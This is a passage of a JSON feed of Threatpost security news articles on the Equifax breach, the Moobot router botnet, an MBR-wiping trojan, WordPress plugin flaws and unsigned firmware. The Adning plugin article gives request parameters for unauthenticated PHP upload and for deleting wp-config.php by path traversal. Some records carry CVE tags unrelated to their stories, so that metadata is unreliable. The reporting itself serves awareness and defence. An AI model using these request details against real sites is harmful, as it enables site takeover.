ransomware, where a new deployment mechanism may need to be written but would likely only result in a single payout per host.\u201d\n\nResearchers were also seeing a number of requests probing for additional vulnerable servers that included whoami and ifconfig, commands that are relatively benign but could return information about what context the server is running in. 
Servers running at root\u2014an uncommon practice\u2014are most at risk.\n", "cvss3": {}, "published": "2017-03-10T10:51:01", "type": "threatpost", "title": "Apache Attack Traffic Dropping, Limited to Few Sources", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-5638"], "modified": "2017-03-10T16:12:17", "id": "THREATPOST:AACAA4F654495529E053D43901F00A81", "href": "https://threatpost.com/apache-attack-traffic-dropping-limited-to-few-sources/124227/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-01-23T05:28:31", "description": "Equifax, the credit agency behind this summer\u2019s breach of 143 million Americans, said this week the number of victims implicated in the breach has increased.\n\nPaulino do Rego Barros, Jr., the company\u2019s interim CEO, [announced Monday](<https://www.equifaxsecurity2017.com/>) that 2.5 million additional Americans were also impacted, bringing the grand total to 145.5 million affected individuals.\n\nEquifax initially called its investigation around the breach \u201csubstantially complete,\u201d but said it was still carrying out further analysis with Mandiant, a FireEye company it hired to investigate the breach, on the incident. According to Equifax, investigators didn\u2019t find any additional vulnerabilities. The extra 2.5 million Americans figure came \u201cduring Mandiant\u2019s completion of the remaining investigative tasks and quality assurance procedures built into the investigative process.\u201d\n\nThe company used the opportunity on Monday to reiterate that Canadian citizens were also impacted, although far fewer than initially thought. 
Several weeks ago the company said that up to 100,000 Canadians may have been affected; however, upon closer inspection, only 8,000 Canadian consumers were affected by the breach.\n\nEquifax says it\u2019s still analyzing exactly how many United Kingdom consumers have been affected by the breach and is in the middle of discussions with regulators to determine how to notify them.\n\nDetails about the breach came out the day before Richard Smith, Equifax\u2019s former CEO, was scheduled to testify about the breach before the U.S. House Committee on Energy and Commerce Subcommittee on Digital Commerce and Consumer Protection. Smith, former Equifax chairman and chief executive, [retired last Tuesday](<https://threatpost.com/oracle-patches-apache-struts-reminds-users-to-update-equifax-bug/128151/>) in the wake of the breach.\n\nIn a [written testimony (.PDF)](<http://docs.house.gov/meetings/IF/IF17/20171003/106455/HHRG-115-IF17-Wstate-SmithR-20171003.pdf>) released in tandem with the subcommittee hearing, Smith blamed the breach on a combination of \u201chuman error and technology failures.\u201d\n\n\u201cThese mistakes \u2013 made in the same chain of security systems designed with redundancies \u2013 allowed criminals to access over 140 million Americans\u2019 data,\u201d Smith wrote.\n\nIn the testimony Smith claimed that the U.S. Department of Homeland Security\u2019s Computer Emergency Readiness Team (U.S. CERT) notified Equifax on March 8 that [it needed to patch CVE-2017-5638](<https://threatpost.com/patch-released-for-critical-apache-struts-bug/127809/>), the Apache Struts vulnerability that eventually led to the hack.\n\nEquifax requested the \u201capplicable personnel responsible\u201d update Apache Struts via email on March 9, something that should have been done within a 48-hour period, Smith said.\n\nThat was never done, and according to Smith, the vulnerability wasn\u2019t picked up by internal scans designed to identify vulnerable systems carried out on March 15. 
The issue lingered for roughly two months until attackers accessed Equifax\u2019s systems on May 13 \u2013 and persisted until the company became aware of the attackers on July 30.\n\nGreg Walden (R-Ore.) pointed out some of Equifax\u2019s many missteps on Tuesday morning, including how Equifax\u2019s consumer-facing website for the breach was hosted on a separate domain from the main Equifax website, the confusion that this spawned, and how on multiple occasions Equifax directed users to the wrong website.\n\n\u201cOn top of all the other issues, multiple times Equifax tweeted the wrong URL directing consumers to the wrong website to check if they were part of a breach,\u201d Walden said. \u201cTalk about ham-handed responses; this is simply unacceptable and it makes me wonder if there was a breach response plan in place at all and if anyone was in charge of executing that plan.\u201d\n\nDuring another part of the hearing, Tim Murphy, a U.S. representative for Pennsylvania\u2019s 18th Congressional district, came back to that question. When told the company\u2019s original site couldn\u2019t handle the traffic it received, Murphy was befuddled.\n\n\u201cWhy wouldn\u2019t your website be able to handle this kind of traffic?\u201d Murphy asked. \u201cIt just doesn\u2019t make sense, a company your size and with your knowledge, doesn\u2019t understand how to handle traffic for over 100 million people, don\u2019t you use an Elastic cloud computing service that would\u2019ve accounted for this?\u201d\n\nSmith said the sheer amount of traffic Equifax\u2019s site received in the wake of the breach made hosting a site on its domain impossible.\n\n\u201cThe environment the micro site is in is a cloud environment that\u2019s very, very scalable,\u201d Smith said. 
\u201cOur traditional environment could not handle 400 million consumer visits for three weeks.\u201d\n\nMurphy also grilled Smith on what took Equifax so long to patch the March vulnerability and if it\u2019s possible Equifax\u2019s internal scanning system could potentially miss another vulnerability.\n\n\u201cIf the patch only took a few days to apply why did Equifax fail to apply it in March when it was announced as critical?\u201d Murphy asked.\n\nSmith skirted the question and instead discussed the difficulties associated with patching.\n\n\u201cPatching can take a variety of time\u2026 it can take days or up to a week or more,\u201d Smith said, adding that he wasn\u2019t aware of the particular Struts vulnerability at the time.\n\nAt the end of the hearing, when pressed by Anna Eshoo, U.S. Representative for California\u2019s 18th congressional district, Smith described the process around patching again but did little to deviate from his prepared testimony.\n\n\u201cI want to know when they did it, when they took care of [the patch]\u201d Eshoo said.\n\n\u201cThey took care of it in July because we never found it,\u201d Smith said. 
\u201cWe had the human error, we did the scan, the technology never found it, in July we found suspicious activity, took the portal down, found the vulnerability, applied the patch.\u201d\n", "cvss3": {}, "published": "2017-10-03T15:27:08", "type": "threatpost", "title": "Equifax Says 145.5M Affected by Breach, Ex-CEO Testifies", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-5638"], "modified": "2017-10-03T15:27:08", "id": "THREATPOST:5E633FD1C6A5B5BB74F1B6A8399001A2", "href": "https://threatpost.com/equifax-says-145-5m-affected-by-breach-ex-ceo-testifies/128247/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2020-10-14T22:26:16", "description": "[](<https://register.gotowebinar.com/register/4136632530104301068?source=art>)The Mootbot botnet has been using a pair of zero-day exploits to compromise multiple types of fiber routers. According to researchers, other botnets have attempted to do the same, but have so far failed.\n\nAccording to researchers at NetLab 360, the operators of the Mootbot botnet in late February started to exploit a zero-day bug found in nine different types of fiber routers used to provide internet access and Wi-Fi to homes and businesses (including the Netlink GPON router). The flaw is a remote code-execution bug with a public proof-of-concept (PoC) exploit \u2013 but for it to be used successfully to compromise a target router, it must be paired with a second vulnerability.\n\n\u201cIt is likely most of the vendors are OEM products of the same original vendor,\u201d the firm explained in a [recent posting](<https://blog.netlab.360.com/multiple-fiber-routers-are-being-compromised-by-botnets-using-0-day-en/>). 
However, NetLab 360 said that it wouldn\u2019t release either the original vendor\u2019s name or details of the second bug, because the vendor told the security firm that it didn\u2019t see the bug as viable.\n\n\u201cOn March 17, we confirmed the exploit was a 0-day and reported the result to CNCERT,\u201d according to the analysis. \u201cWe also contacted the vendor but were told this problem should not be happening because the default config of the device should not have this issue (the reality is different). So they won\u2019t take this case from us.\u201d\n\nDespite that initial assessment, PoC code for the bug emerged on ExploitDB a day later. And a day after that, on March 19, the firm saw attacks in the wild using the PoC to attempt to spread the Gafgyt botnet. A few days later, the botnet had adopted the PoC as part of a worming attempt to move from router to router. Meanwhile, on March 24, another wave of exploit attempts emerged using the PoC, this time trying to spread the Fbot botnet.\n\n\u201cThe PoC leaves out a crucial prerequisite \u2013 another vulnerability needs to be used together with this PoC for it to work,\u201d researchers explained. \u201cSo, a successful execution of the injected commands will not have the target device compromised.\u201d\n\nMoobot is a new botnet family based on the [Mirai botnet](<https://threatpost.com/mirai-enterprise-systems/142889/>), which targets internet of things (IoT) devices. While most IoT botnets go after gear that may have weak or default passwords, Mootbot stands out for its use of zero-day exploits, researchers said. 
It\u2019s worth noting that the malware [was also seen in March](<https://threatpost.com/hackers-exploited-0-day-cctv-camera/154051/>) using multiple zero days to target LILIN DVR and IP cameras.\n\nThough it didn\u2019t release details of the second success factor in the kill chain, NetLab 360 recommended that to protect against the threat, users that have fiber-based internet access routers should check and update their device firmware, and check whether there are default accounts that should be disabled.\n\nJack Mannino, CEO at nVisium, told Threatpost that the [focus on routers](<https://threatpost.com/thousands-of-mikrotik-routers-hijacked-for-eavesdropping/137165/>) offers attackers certain advantages.\n\n\u201cControlling network infrastructure will always be an appealing attacker goal because of the springboard it provides for launching future attacks,\u201d he said. \u201cAs a software developer, it\u2019s important to consider that the networks your users access your product from may be compromised, and build this into your threat models. Whether it\u2019s the level of access it provides to network traffic, or the chokepoints and amplifiers for DDoS attacks they present, previous botnets, such as Mirai, gave us a glimpse into what these campaigns can achieve. More security teams focus on their Patch Tuesday fixes than updating the devices they frequently expose directly to the internet.\u201d\n\n**_Worried about your cloud security in the work-from-home era? On _****_April 23 at 2 p.m. ET_****_, join DivvyCloud and Threatpost for a FREE webinar, _**[**_A Practical Guide to Securing the Cloud in the Face of Crisis_**](<https://attendee.gotowebinar.com/register/4136632530104301068?source=art>)**_. Get exclusive research insights and critical, advanced takeaways on how to avoid cloud disruption and chaos in the face of COVID-19 \u2013 and during all times of crisis. 
_**[**_Please register here_**](<https://attendee.gotowebinar.com/register/4136632530104301068?source=art>)_** for this sponsored webinar.**_\n", "cvss3": {}, "published": "2020-04-20T20:51:59", "type": "threatpost", "title": "Mootbot Botnet Targets Fiber Routers with Dual Zero-Days", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-5135"], "modified": "2020-04-20T20:51:59", "id": "THREATPOST:E95F180BE3CA693890795666169A5F04", "href": "https://threatpost.com/mootbot-fiber-routers-zero-days/154962/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2020-10-14T22:26:51", "description": "A new Windows malware has emerged that makes disks unusable by overwriting the master boot record (MBR). It takes its cue from the COVID-19 pandemic, calling itself simply \u201cCoronavirus.\u201d\n\nOverwriting the MBR is the same trick that the infamous NotPetya wiper malware used in 2017 in a campaign that caused widespread, [global financial damage](<https://threatpost.com/pharmaceutical-giant-still-feeling-notpetyas-sting/127130/>).\n\nWorryingly, according to the SonicWall Capture Labs Threat Research team, the fresh malware strain is also a destructive trojan \u2014 though not as destructive as other wipers. And like its namesake, there\u2019s no obvious cure. In [a posting on Tuesday](<https://securitynews.sonicwall.com/xmlpost/coronavirus-trojan-overwriting-the-mbr/>), researchers explained that victims of the Coronavirus trojan find themselves with a gray screen and a blinking cursor with a simple message, \u201cYour computer has been trashed.\u201d\n\nThe novel coronavirus, and the disease it causes, COVID-19, has provided a depth of fodder for cybercriminals looking to capitalize on the global concern around the pandemic. 
For instance, a recent spate of phishing attacks has used [the promise of financial relief](<https://threatpost.com/coronavirus-financial-relief-phishing-spike/154358/>) due to the disease as a lure. However, the operator behind this malware takes it one step further, going so far as to take the coronavirus as its name and infection theme.\n\nAs far as that infection routine, the malware can be delivered in any of the usual ways \u2013 as a malicious email attachment, file download, fake application and so on.\n\nUpon execution, the malware starts its process by installing a number of helper files, which are placed in a temporary folder. The malware cleaves tight to its pandemic theme: An installer (a helper file named \u201ccoronavirus.bat\u201d) sets up the attack by creating a hidden folder named \u201cCOVID-19\u201d on the victim machine. The previously dropped helper files are then moved there, in an effort to go unnoticed until its goal is achieved.\n\nAfter that, the installer disables Windows Task Manager and User Access Control (UAC) in a further stab at obfuscation, according to the analysis. It also changes the victim\u2019s wallpaper, and disables options to add or modify that wallpaper after the change is made. It also adds entries in registry for persistence, and then sets about rebooting to finish the installation.\n\nThe process run.exe creates a batch file named run.bat to ensure the registry modifications done by \u201ccoronavirus.bat\u201d are kept intact during the reboot process, according to SonicWall.\n\nAfter reboot, the infection executes two binaries. One, \u201cmainWindow.exe,\u201d displays a window with a picture of the coronavirus itself, with two buttons. 
At the top of the window, the victim is notified that \u201ccoronavirus has infected your PC!\u201d\n\nThe two buttons read \u201cRemove virus\u201d and \u201cHelp.\u201d The former does nothing when clicked; the latter brings up a pop-up that tells victims to \u201cnot wast [sic] your time\u201d because \u201cyou can\u2019t terminate this process!\u201d\n\nThe other binary carries out the meat of the attack: It\u2019s responsible for overwriting the MBR.\n\n\u201cThe original MBR is first backed up in the first sector before it is overwritten with new one, [and the] MBR is overwritten with the new code,\u201d according to the researchers.\n\nOnce the overwrite is complete, the victim\u2019s display is changed to a simple grey screen delivering the bad news:\n\n[Image: the grey screen shown after the MBR overwrite]\n\nSonicWall told Threatpost in an email interview that it was able to analyze the sample after it was uploaded to VirusTotal. Thus, so far, there haven\u2019t been many instances of \u201cCoronavirus\u201d observed in the wild, and little is known in terms of targeting or what the spreading mechanisms are for the mysterious new malware.\n\nThe team also told Threatpost that the good news is that this is not as dangerous as other wiper strains.\n\n\u201cEven if the MBR is not restored\u2026data can still be accessed/recovered by mounting the drive,\u201d the firm noted. \u201cThe MBR [also] can be potentially restored, but it is not easy and [requires deep technical knowledge](<https://neosmart.net/wiki/fix-mbr/>).\u201d\n\n_**Do you suffer from Password Fatigue? On [Wednesday April 8 at 2 p.m. 
ET](<https://attendee.gotowebinar.com/register/7732731543372035596?source=art>) join **_**_Duo Security and Threatpost as we explore a [passwordless](<https://attendee.gotowebinar.com/register/7732731543372035596?source=art>) future. This [FREE](<https://attendee.gotowebinar.com/register/7732731543372035596?source=art>) webinar maps out a future where modern authentication standards like WebAuthn significantly reduce a dependency on passwords. We\u2019ll also explore how teaming with Microsoft can reduce reliance on passwords. [Please register here](<https://attendee.gotowebinar.com/register/7732731543372035596?source=art>) and dare to ask, \u201c[Are passwords overrated?](<https://attendee.gotowebinar.com/register/7732731543372035596?source=art>)\u201d in this sponsored webinar. _**\n", "cvss3": {}, "published": "2020-04-01T21:07:22", "type": "threatpost", "title": "Wiper Malware Called \"Coronavirus\" Spreads Among Windows Victims", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-5135"], "modified": "2020-04-01T21:07:22", "id": "THREATPOST:F18124E38523CE6CF73ACDCF7DBF78BC", "href": "https://threatpost.com/wiper-malware-coronavirus-windows-victims/154368/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2020-10-14T22:08:58", "description": "Two high-severity vulnerabilities in Post Grid, a WordPress plugin with more than 60,000 installations, open the door to site takeovers, according to researchers. To boot, nearly identical bugs are also found in Post Grid\u2019s sister plugin, Team Showcase, which has 6,000 installations.\n\nThe issues are a cross-site scripting (XSS) flaw as well as a PHP object-injection issue. Both bugs are pending CVE numbers, and both are high-severity, rating 7.5 out of 10 on the CVSS vulnerability rating scale.\n\nPost Grid, true to its name, allows users to display their posts in a grid layout; meanwhile, Team Showcase offers a way to easily highlight an organization\u2019s team members. 
Both allowed the import of custom layouts, and used nearly identical \u2013 and vulnerable \u2013 functions for doing so, according to Ram Gall, researcher with Wordfence.\n\nThe XSS bug would allow an attacker to supply a source parameter pointing to a crafted malicious payload hosted elsewhere. The function would then open the file containing the payload, decode it and create a new page layout based on its contents.\n\n\u201cThe created layout included a custom_scripts section, and an attacker could add malicious JavaScript to the custom_css portion of this section,\u201d explained Gall, [in a posting](<https://www.wordfence.com/blog/2020/10/high-severity-vulnerabilities-in-post-grid-and-team-showcase-plugins/>) on Monday. \u201cThis would then be executed whenever an administrative user edited the layout or a visitor visited a page based on the layout.\u201d\n\nThe upshot is that attackers could use the malicious JavaScript to add a malicious administrator, add a backdoor to plugin or theme files, or steal the administrator\u2019s session information \u2013 all of which are paths to complete takeover of a site.\n\nTriggering an exploit is also somewhat trivial.\n\n\u201cIn both cases, a logged-in attacker with minimal permissions such as subscriber could trigger the functions by sending an AJAX request, with the action set to post_grid_import_xml_layouts for the Post Grid plugin or team_import_xml_layouts for the Team Showcase plugin, with each action triggering a function with the same name,\u201d Gall explained.\n\nThe second issue, the PHP object-injection bug, arises in the import function because it unserialized the payload supplied in the source parameter. 
An attacker could therefore execute arbitrary code, delete or write files, or perform any number of other actions which could lead to site takeover.\n\nTo trigger the flaw, \u201can attacker could craft a string that would be unserialized into an active PHP object,\u201d Gall explained. \u201cAlthough neither plugin utilized any vulnerable magic methods, if another plugin using a vulnerable magic method was installed, Object injection could be used by an attacker.\u201d\n\nBoth vulnerabilities would typically require the attacker to have an account with at least subscriber level privileges \u2013 but there\u2019s a loophole.\n\n\u201cHowever, sites using a plugin or theme that allowed unauthenticated visitors to execute arbitrary shortcodes would be vulnerable to unauthenticated attackers,\u201d Gall added.\n\nThe plugins\u2019 developer, PickPlugins, has issued patches, so web admins should upgrade as soon as possible. The fixed versions are Post Grid v. 2.0.73 and Team Showcase v. 1.22.16.\n\nThese are the latest in the line of faulty WordPress plugins that have come to light this year. In September, a high-severity flaw in the Email Subscribers & Newsletters plugin by Icegram [was found to affect](<https://threatpost.com/wordpress-plugin-flaw/159172/>) more than 100,000 WordPress websites.\n\n[Earlier in August](<https://threatpost.com/critical-flaws-wordpress-quiz-plugin-site-takeover/158379/>), a plugin that is designed to add quizzes and surveys to WordPress websites patched two critical vulnerabilities. The flaws could be exploited by remote, unauthenticated attackers to launch varying attacks \u2013 including fully taking over vulnerable websites. 
[Also in August,](<https://threatpost.com/newsletter-wordpress-plugin-site-takeover/158025/>) Newsletter, a WordPress plugin with more than 300,000 installations, was discovered to have a pair of vulnerabilities that could lead to code-execution and even site takeover.\n\nAnd, [researchers in July warned](<https://threatpost.com/critical-rce-flaw-wordpress-plugin-on-70k-sites/157824/>) of a critical vulnerability in a WordPress plugin called Comments \u2013 wpDiscuz, which is installed on more than 70,000 websites. The flaw gave unauthenticated attackers the ability to upload arbitrary files (including PHP files) and ultimately execute remote code on vulnerable website servers.
\n", "cvss3": {}, "published": "2020-10-05T21:11:44", "type": "threatpost", "title": "Post Grid WordPress Plugin Flaws Allow Site Takeovers", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-5135"], "modified": "2020-10-05T21:11:44", "id": "THREATPOST:8E52FA6620F4FFE6ED3A412867239F2B", "href": "https://threatpost.com/wordpress-plugin-flaws/159856/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2020-10-14T22:26:12", "description": "The Adning Advertising plugin for WordPress, a premium plugin with over 8,000 customers, contains a critical remote code-execution vulnerability with the potential to be exploited by unauthenticated attackers.\n\nThe plugin\u2019s author, Tunafish, has rolled out a patched version (v.1.5.6), which site owners should update to as soon as possible. No CVE was issued.\n\nThe bug could allow complete site takeover, earning it a 10 out of 10 on the CVSS bug-severity scale. Also, it has already been the subject of in-the-wild attacks, according to [an analysis](<https://www.wordfence.com/blog/2020/07/critical-vulnerabilities-patched-in-adning-advertising-plugin/>) from Wordfence issued on Wednesday. That said, the firm said the attacks so far have been limited in scope and scale.\n\nThe flaw exists in the Adning plugin\u2019s ability to allow users to upload banner images, researchers said.\n\n\u201cIn order to provide this functionality, it used an AJAX action, _ning_upload_image,\u201d according to the researchers. \u201cUnfortunately, this AJAX action was available with a nopriv_ hook, meaning that any visitor to the site could make use of it, even if they were not logged in. 
Additionally, the function called by this AJAX action also failed to make use of a capability check or a nonce check.\u201d\n\nThis function also allowed the user to supply the \u201callowed\u201d file types \u2013 which means that an unauthenticated attacker could upload malicious code by sending a POST request to wp-admin/admin-ajax.php.\n\nThis could be performed \u201cwith the action parameter set to _ning_upload_image the allowed_file_types set to php and a files parameter containing a malicious PHP file,\u201d researchers said. \u201cAlternatively, an attacker could set the allowed_file_types to zip and upload a compressed archive containing a malicious PHP file, which would be unzipped after upload.\u201d\n\n## **A Second Bug**\n\nWordfence researchers also found a second security vulnerability, which allows unauthenticated arbitrary file deletion via path traversal.\n\nCarrying a high-severity CVSS score of 8.7, this bug is also patched in v.1.5.6.\n\n\u201cIn order to delete any uploaded images, the plugin also registered another ajax action, _ning_remove_image, which also used a nopriv_ hook,\u201d according to the analysis. \u201cAs with the upload vulnerability, this function did not perform a capability check or a nonce check. As such it was possible for an unauthenticated attacker to delete arbitrary files using path traversal.\u201d\n\nAlso, according to Wordfence, if an attacker were able to delete the specific file wp-config.php, the site would be reset, offering attackers an opportunity to set it up again. They could use their own remote databases under their control, effectively replacing the site\u2019s content with their own content.\n\n\u201cThis might require an extra step of preparation, which is that the wp-content/uploads/path folder would need to exist,\u201d according to Wordfence. \u201cHowever, since the previously mentioned arbitrary file-upload vulnerability allowed for directory creation, this was not a major obstacle. 
Once the directory was created, an attacker could send a POST request to wp-admin/admin-ajax.php with the action parameter set to _ning_remove_image, the uid parameter set to /../../.. and the src parameter set to wp-config.php.\u201d\n\n## **WordPress Plugins: A Weak Link**\n\nWordPress plugins continue to crop up with concerning vulnerabilities that put sites at risk. In May for instance, Page Builder by SiteOrigin, a WordPress plugin with a million active installs that\u2019s used to build websites via a drag-and-drop function, [was found to harbor](<https://threatpost.com/wordpress-page-builder-bugs-takeover/155659/>) two flaws that could allow full site takeover.\n\nMeanwhile in April, it was revealed that legions of website visitors could be infected with drive-by malware, among other issues, thanks to a [CSRF bug in Real-Time Search and Replace](<https://threatpost.com/wordpress-plugin-bug-100k-websites-compromise/155230/>). Also that month, a pair of security vulnerabilities (one of them critical), in the WordPress search engine optimization (SEO) plugin known as Rank Math, [were found](<https://threatpost.com/critical-wordpress-plugin-bug-lock-admins-out/154354/>). They could allow remote cybercriminals to elevate privileges and install malicious redirects onto a target site, according to researchers. RankMath is a WordPress plugin with more than 200,000 installations.\n\nIn March, another critical vulnerability in a WordPress plugin known as \u201cThemeREX Addons\u201d [was found](<https://threatpost.com/themerex-wordpress-plugin-remote-code-execution/153592/>) that could open the door for remote code execution in 44,000 websites.\n\nAlso in March, two vulnerabilities \u2013 including a high-severity flaw \u2013 [were patched](<https://threatpost.com/wordpress-plugin-bug-popup-builder/153715/>) in a popular WordPress plugin called Popup Builder. 
The more severe flaw could enable an unauthenticated attacker to inject malicious JavaScript into a popup \u2013 potentially opening up more than 100,000 websites to takeover.\n\nAnd in February, popular WordPress plugin Duplicator, which has more than 1 million active installations, [was discovered to have](<https://www.wordfence.com/blog/2020/03/zero-day-vulnerability-in-themerex-addons-now-patched/>) an unauthenticated arbitrary file download vulnerability that was being attacked. And, earlier that month, a critical flaw in a popular WordPress plugin that helps make websites compliant with the General Data Protection Regulation (GDPR) [was disclosed](<https://threatpost.com/critical-wordpress-plugin-bug-afflicts-700k-sites/152871/>). The flaw could enable attackers to modify content or inject malicious JavaScript code into victim websites. It affected 700,000 sites.
\n", "cvss3": {}, "published": "2020-07-08T20:12:05", "type": "threatpost", "title": "Advertising Plugin for WordPress Threatens Full Site Takeovers", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-5135"], "modified": "2020-07-08T20:12:05", "id": "THREATPOST:49EFC5B6CFCA04F105A001AAFED52548", "href": "https://threatpost.com/advertising-plugin-wordpress-full-site-takeovers/157283/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2020-10-14T22:30:12", "description": "Fresh firmware vulnerabilities in Wi-Fi adapters, USB hubs, trackpads and cameras are putting millions of peripheral devices in danger of a range of cyberattacks, according to research from Eclypsium.\n\nTouchPad and TrackPoint firmware in Lenovo Laptops, HP Wide Vision FHD camera firmware in HP laptops and the Wi-Fi adapter on Dell XPS laptops were all found to lack secure firmware update mechanisms with proper code-signing.\n\n\u201cSoftware and network vulnerabilities are often the more-obvious focus of organizations\u2019 security priorities, but firmware vulnerabilities could give adversaries full control over the compromised device,\u201d Katie Teitler, senior analyst at TAG Cyber, said via email. \u201cThis could lead to implanted backdoors, network traffic sniffing, data exfiltration and more. Unfortunately, though, firmware vulnerabilities can be harder to detect and more difficult to patch.\u201d\n\n## Unsigned Firmware Updates: A Growing Problem\n\nFirmware for peripherals can be burned into the integrated circuit of the device itself, or the component may have its own flash memory where firmware is stored. Firmware can also be dynamically provided by the operating system at boot time. 
Regardless of the implementation approach, firmware is used as the device-specific operating system for the peripheral in question, and can provide criminals with a rich attack surface if found to be vulnerable.\n\n\u201cMany peripheral devices do not verify that firmware is properly signed with a high-quality public/private key before running the code,\u201d explained researchers at Eclypsium, in vulnerability research [released on Tuesday](<https://eclypsium.com/2020/2/18/unsigned-peripheral-firmware/>). \u201cThis means that these components have no way to validate that the firmware loaded by the device is authentic and should be trusted. An attacker could simply insert a malicious or vulnerable firmware image, which the component would blindly trust and run.\u201d\n\nThe scenario for an attack is thus a simple one. First, an attacker gains access to a device by any method (physical access, malware that allows remote code execution and so on). Then, with basic user privileges, the attacker can write malicious firmware to a vulnerable component. If the component doesn\u2019t require the firmware to be properly signed, the attacker\u2019s code is loaded. Depending on the peripheral in question, this can lead to a range of malicious activity.\n\n\u201cFor example, malicious firmware on a network adapter could allow an attacker to sniff, copy, redirect or alter traffic leading to a loss of data, man-in-the-middle and other attacks,\u201d according to the research. \u201cPCI-based devices could enable [Direct Memory Access (DMA) attacks](<https://threatpost.com/dell-hp-memory-access-bugskernel-privileges/152369/>) that could easily steal data or take full control over the victim system. 
Cameras could be used to capture data from the user\u2019s environment, while a compromised hard drive could allow the attacker to hide code and tools without being seen by the operating system.\u201d\n\nFurther, firmware attacks allow malicious activity to fly under the radar of endpoint protections; as recently seen in the [latest campaigns using the RobbinHood ransomware](<https://threatpost.com/byo-bug-windows-kernel-outdated-driver/152762/>), vulnerable drivers can be used to bypass security protections and enable ransomware to attack without interference.\n\nJesse Michael, principal researcher at Eclypsium, told Threatpost that the kinds of attacks that these bugs enable are not insignificant. For instance, the Black Energy attack that brought down part of the power grid in Ukraine used an unsigned firmware update to break serial-to-Ethernet adapters that were used to control relays.\n\n\u201cA similar incident occurred with Saudi Aramco,\u201d he said. \u201cThis made the system much harder to bring back online.\u201d He added that the number of firmware/hardware CVEs has increased 7.5-fold compared with three years ago.\n\n## New Vulnerabilities\n\nEclypsium researchers analyzed a Lenovo ThinkPad X1 Carbon 6th Gen laptop, which contains two vulnerable firmware mechanisms: Touchpad firmware (pr2812761-tm3288-011-0808.img) and TrackPoint firmware (PSG5E5_RANKA_fv06.bin).\n\n\u201cWe discovered that the Touchpad and TrackPoint use insecure firmware update mechanisms,\u201d according to the research. \u201cSpecifically, cryptographic signature verification was not required at the device level before firmware updates were applied. 
This lack of control made it possible to modify the firmware images through software to run arbitrary malicious code within these components.\u201d\n\nMeanwhile, the firmware updates distributed by HP for the HP Wide Vision FHD camera found in the HP Spectre x360 Convertible 13-ap0xxx laptop are unencrypted and lack authenticity checks, Eclypsium noted. The device\u2019s firmware updater is composed of SunplusIT\u2019s Windows-based firmware update tool along with the firmware image, and both have issues.\n\n\u201cThe firmware image does not include any form of cryptographic signature or other authenticity information,\u201d according to the report. \u201cThe Windows-based firmware update tool accepts firmware files that have been modified to adjust USB descriptor contents. This ability to modify USB descriptors can be leveraged to disable the device or cause it to be identified as a different type of USB device. Once additional details of the processor architecture are discovered, the camera module behavior can be altered to be malicious.\u201d\n\nAlso, the SunplusIT firmware updater can successfully update a device even as a normal user, rather than requiring administrator access \u2013 a violation of best practices.\n\nEclypsium researchers also found that the firmware of the Wi-Fi adapter on Dell XPS 15 9560 laptops running Windows 10 has a bug. While Windows 10 will confirm that the drivers are correctly signed, that\u2019s where the security checks stop. So, if the drivers are correctly signed, a small certificate icon is displayed next to the driver when viewed in the device manager. If they aren\u2019t correctly signed, a user can still successfully load them \u2013 the icon merely goes away. This means that a privileged attacker could easily replace driver files.\n\nAnd finally, the researchers also took a look at the Linux Vendor Firmware Service, which is a secure portal that allows hardware vendors to upload firmware updates. 
An analysis showed multiple insecure updates and drivers.\n\n\u201cFrom this resource we can focus specifically on update protocols and easily review which are signed and which are not,\u201d the researchers wrote. \u201cWhile we can see that some of the update protocols are related to transport, many others are protocols used for the actual update process. For example, VLI USB Hub firmware is unsigned.\u201d\n\n## Vendor Response\n\nEclypsium researchers notified HP of the webcam firmware vulnerability on August 4, and Lenovo of the TouchPad/TrackPoint vulnerability on June 13.\n\n\u201cWe expect some vendors will issue CVEs, but none have as of yet,\u201d Jesse Michael, principal researcher at Eclypsium, told Threatpost. \u201cFor these peripherals, the OEMs (HP and Lenovo) have to work with their suppliers to develop fixes. From what we\u2019ve seen, most of these existing components were initially designed to have unsigned firmware, making them inherently vulnerable. Our interactions with these OEMs lead us to expect that future systems will have firmware update authentication requirements built in.\u201d\n\nEclypsium also reported the Wi-Fi issue to both Qualcomm, which provides the chipset and driver for the wireless card, and to Microsoft, which checks that such drivers are signed.\n\n\u201cQualcomm responded that their chipset is subordinate to the processor, and that the software running on the CPU is expected to take responsibility for validating firmware,\u201d Michael said. \u201cThey stated that there was no plan to add signature verification for these chips. 
However, Microsoft responded that it was up to the device vendor to verify firmware that is loaded into the device.\u201d The result is that this will likely go unaddressed, since each is pointing the responsibility back to the other.\n\nBottom line: Unsigned firmware in peripheral devices remains a highly overlooked aspect of cybersecurity, and provides multiple pathways for malicious actors to compromise laptops and servers.\n\n\u201cOnce firmware on any of these components is infected, the malware stays undetected by any software security controls,\u201d Michael said. \u201cDespite previous in-the-wild attacks, peripheral manufacturers have been slow to adopt the practice of signing firmware, leaving millions of Windows and Linux systems at risk of firmware attacks that can exfiltrate data, disrupt operations and deliver ransomware.\u201d\n", "cvss3": {}, "published": "2020-02-18T11:00:08", "type": "threatpost", "title": "Lenovo, HP, Dell Peripherals Face Unpatched Firmware Bugs", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-5135"], "modified": "2020-02-18T11:00:08", "id": "THREATPOST:815A85AC4471792F2F220EAD5DD49460", "href": "https://threatpost.com/lenovo-hp-dell-peripherals-unpatched-firmware/152936/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2020-10-14T22:21:12", "description": "A cryptomining worm from the group known as TeamTNT is spreading through the Amazon Web Services (AWS) cloud and collecting credentials. 
